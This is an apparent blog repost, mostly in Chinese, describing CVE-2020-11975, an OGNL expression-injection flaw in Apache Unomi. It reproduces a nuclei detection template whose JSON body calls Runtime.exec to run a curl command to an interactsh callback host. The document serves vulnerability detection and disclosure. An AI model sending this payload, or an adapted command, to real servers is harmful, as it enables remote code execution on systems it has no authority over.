Apache Unomi Expression Language Injection Vulnerability

漏洞信息

漏洞名称: Apache Unomi Expression Language Injection Vulnerability

漏洞编号:

  • CVE: CVE-2020-11975

漏洞类型: 代码注入

漏洞等级: 严重

漏洞描述: Apache Unomi是一个开源的客户数据平台(CDP),用于管理用户数据和个性化用户体验,广泛应用于企业级服务中,特别是在需要高度个性化用户交互的Web应用程序中。该平台允许通过条件使用OGNL脚本,这为攻击者提供了利用漏洞的机会。漏洞的技术根源在于Apache Unomi允许条件使用OGNL脚本,这提供了调用JDK中的静态Java类的可能性,这些类可以以运行Java进程的权限级别执行代码。攻击者可以利用此漏洞执行任意代码,但利用此漏洞需要访问OGNL脚本功能。此漏洞的影响极为严重,因为它允许攻击者在未授权的情况下远程执行任意代码,可能导致数据泄露、服务中断或其他恶意活动。由于漏洞的利用不需要用户交互,且可以自动化执行,因此其风险等级被评定为严重。

产品厂商: Apache

产品名称: Apache Unomi

来源: https://github.com/projectdiscovery/nuclei-templates/blob/25579a21daaba847f878d9c8fa92aaf6db673b76/http%2Fcves%2F2020%2FCVE-2020-11975.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

id: CVE-2020-11975

info:
  name: Apache Unomi - Expression Language Injection
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, letting attackers execute arbitrary code, exploit requires access to OGNL scripting feature.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 1
  tags: rce,cve,cve2020,apache,ognl,unomi,expression-injection

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or


Github Poc
#projectdiscovery/nuclei-templates:github issues #代码注入
Apache Unomi Expression Language Injection Vulnerability
http://example.com/2025/07/21/github_479464272/
作者
lianccc
发布于
2025年7月21日
许可协议